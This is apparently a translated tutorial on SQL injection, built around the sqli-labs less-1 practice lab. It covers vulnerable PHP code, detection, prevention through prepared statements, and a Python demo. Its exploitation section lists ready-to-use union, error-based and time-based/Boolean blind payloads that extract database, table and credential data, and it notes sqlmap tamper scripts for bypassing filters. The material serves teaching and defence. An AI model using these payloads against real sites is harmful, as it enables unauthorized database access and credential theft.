
The principle of SQL injection vulnerability

2025-01-24 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article explains "the principle of SQL injection vulnerability". The content is simple and clear and easy to learn; please follow the editor's train of thought to study "the principle of SQL injection vulnerability".

An example of the principle of vulnerability

After the user submits data, the back-end server places the submitted data into a SQL statement and executes it against the database. If the data is not filtered, the user can submit a specially constructed string and perform unauthorized operations on the database; that is SQL injection. The following code (sqli-labs less-1) shows it.

// GET obtains the value of the parameter named id and assigns it to the $id variable
$id = $_GET['id'];
// define the $sql variable, the SQL statement to be executed next, with the $id variable interpolated into it
$sql = "SELECT * FROM user WHERE id='$id' LIMIT 0,1";
// execute the $sql variable defined above as a database query and assign the result to $result;
// mysql_query is the database query function PHP provides
$result = mysql_query($sql);
// return one row of the result set from the previous query as an array and assign it to $row
$row = mysql_fetch_array($result);
// if $row is not empty, i.e. the query returned data normally, print the username and password values;
// otherwise print the database error message
if ($row) {
    echo 'Your Login name:' . $row['username'];
    echo "<br>";
    echo 'Your Password:' . $row['password'];
    echo "<br>";
} else {
    echo '<font color="#FFFF00">';
    print_r(mysql_error());
    echo "</font>";
}

The data in the database is as follows

If the user submits id=1, the database query runs normally and the output is normal.

But if the data submitted by the user is

?id=-1' union select 1,2,database()--+

Then it will return the value returned by the query operation on the database by the statement we constructed.

Substituting the two submissions into the statement executed by the back end gives the following:

Original statement: SELECT * FROM user WHERE id='$id' LIMIT 0,1
Normal data brought in: SELECT * FROM user WHERE id='1' LIMIT 0,1
Malicious data brought in: SELECT * FROM user WHERE id='-1' union select 1,2,database()-- +' LIMIT 0,1
(Note: when a SQL statement is executed, "--" is the comment marker, but there must be a space after "--", otherwise an error is reported. The "+" here becomes a space after URL decoding; it separates the "--" from the single quotation mark that follows, so that the rest of the statement is commented out.)

As you can see, if the malicious data submitted by the user is passed to the back end and executed without filtering, the statement actually executed is SELECT * FROM user WHERE id='-1' union select 1,2,database(), and the commented-out part is not executed, so no error is raised. Since no row has id=-1, the union query runs, queries the database name, and it is output. This is the most typical SQL injection.

Vulnerability classification

Rather than classifying injections as numeric or character type, I find it easier to understand them by the way they are exploited.

With echo (the query result is visible in the response)

Union query: union query injection; the query result is obtained through a UNION query.
Error based: error-based injection; the query result is obtained through the error message.

Without echo

Boolean based blind: Boolean blind injection; whether the condition is true or false is judged from the different responses returned.
Time based blind: time-based blind injection; whether the condition is true or false is inferred from the difference in response delay.

Vulnerability detection

Manual detection

When a submitted parameter interacts with the database, add a single quotation mark (') to the parameter. If this causes an exception (a SQL syntax error), SQL injection exists. If there is no echo, the vulnerability can be checked by time-delay or Boolean blind injection.

Note: the exception occurs because the back end places the single quotation mark in the parameter into the SQL statement it runs against the database; the extra single quote makes the SQL syntax invalid, so the error shows that our single quotation mark was parsed as part of the executed SQL statement.

Tool detection

Use sqlmap for detection. The original article links to its download address and usage instructions.

Vulnerability exploitation

Manual injection

With echo, construct statements that query the data directly; without echo, use blind injection, which takes more time.

Here I take the MySQL database and sqli-labs less-1 as an example and list some commonly used statements. Explaining each in detail would make this far too long for one article; use more statements as you need them, and the details of how each is injected can be covered in separate articles if necessary.

UNION query injection
Number of columns: ?id=-1' order by n--+ (increase n until an error is reported; the largest n that does not error is the number of columns)
Database name: ?id=-1' union select 1,2,database()--+
Table names: ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
Column names: ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
Data: ?id=-1' union select 1,group_concat(username),group_concat(password) from users--+
Note: adjust the number of fields (columns) and the database and table names according to the actual situation. The number of fields in the union select must equal the number of columns in the original table, otherwise an error is reported.

Error-based injection
Database name: ?id=-1' union select count(*),count(*),concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
Table name: ?id=-1' union select count(*),count(*),concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 3,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a--+
Column name: ?id=-1' union select count(*),1,concat('~',(select column_name from information_schema.columns where table_name='users' limit 1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a--+
Data: ?id=-1' union select count(*),1,concat('~',(select concat_ws(':',username,password) from users limit 1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a--+

Time-based blind injection (the same conditions as the Boolean payloads below, each wrapped in if(condition,sleep(5),NULL))
Length of the database name: ?id=1' and if(length(database())=8,sleep(5),NULL)--+
Database name: ?id=1' and if(left(database(),1)='s',sleep(5),NULL)--+
Table name: ?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),NULL)--+
Column name: ?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 1),8)='username',sleep(5),NULL)--+
Data: ?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb',sleep(5),NULL)--+
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb',sleep(5),NULL)--+

Boolean-based blind injection
Database name: ?id=1' and left(database(),1)='s'--+
Table name: ?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users'--+
Column name: ?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 1),8)='username'--+
Data: ?id=1' and left((select username from users order by id limit 0,1),4)='dumb'--+

Another way to use an injection without echo is to carry the query result out through DNSlog. Another author has explained this in detail; the original article links to that text.

The above is GET-type injection; POST-type injection is similar, you only need to modify the parameter values.

Tool injection

Still sqlmap in one go; in real engagements use tamper scripts as needed to bypass some filtering.

Common scene

User-controllable parameters that interact with the database, most commonly search, query and login functions.

During testing you can also crawl the website's API query interfaces, which may contain SQL injection as well.

Vulnerability prevention

WAF (Web Application Firewall)

Adding a WAF to a website does not fix the SQL injection vulnerability itself, but it can intercept requests carrying sensitive data and prevent the injection from being exploited by attackers.

Filter filtering

Add filtering code on the server side to filter the sensitive characters that may trigger SQL injection.

SQL precompilation (prepared statements)

Example:

prepare baizesec from 'select username,password from users where id=?';  -- define the prepared statement
set @a=1;                                                                 -- pass the parameter
execute baizesec using @a;                                                -- execute it
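The following is an added example, not code from the article or from sqli-labs, that puts the less-1 splicing, the single-quote detection check and the prepared-statement fix side by side so they can be run offline. It assumes an in-memory SQLite database with constructed rows standing in for the "user" table, and since database() is MySQL-only, the union payload from the article is rewritten with a constructed marker string in its place.

```python
import sqlite3

# Constructed sample rows standing in for the sqli-labs "user" table (not the page's data).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]

# The page's union payload after URL decoding turned the trailing "+" into a space;
# database() is MySQL-only, so a constructed marker string stands in for it here.
UNION_PAYLOAD = "-1' union select 1,2,'injected'-- "


def make_db() -> sqlite3.Connection:
    """In-memory database holding the constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def query_concatenated(conn, user_id: str):
    """Mirrors the less-1 PHP: the submitted value is spliced into the SQL text,
    so whatever the user sends is parsed as part of the statement."""
    sql = f"SELECT * FROM user WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def query_prepared(conn, user_id: str):
    """Same query with a placeholder, as in the page's 'prepare ... using @a':
    the value is bound as data and never reaches the SQL parser."""
    sql = "SELECT * FROM user WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


def single_quote_probe(query, conn) -> bool:
    """The page's manual check: submit id=1' and see whether the database raises a
    syntax error. True means the quote was interpreted as SQL, i.e. injection exists."""
    try:
        query(conn, "1'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", query_concatenated), ("prepared", query_prepared)):
        print(name, "id=1 ->", fn(db, "1"))
        print(name, "single-quote probe raises error:", single_quote_probe(fn, db))
        print(name, "union payload ->", fn(db, UNION_PAYLOAD))
```

With the spliced query the probe errors and the union payload returns a row that is not in the table at all; with the placeholder the same input is just a non-matching id, which is why parameter binding rather than character filtering is the fix to rely on.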
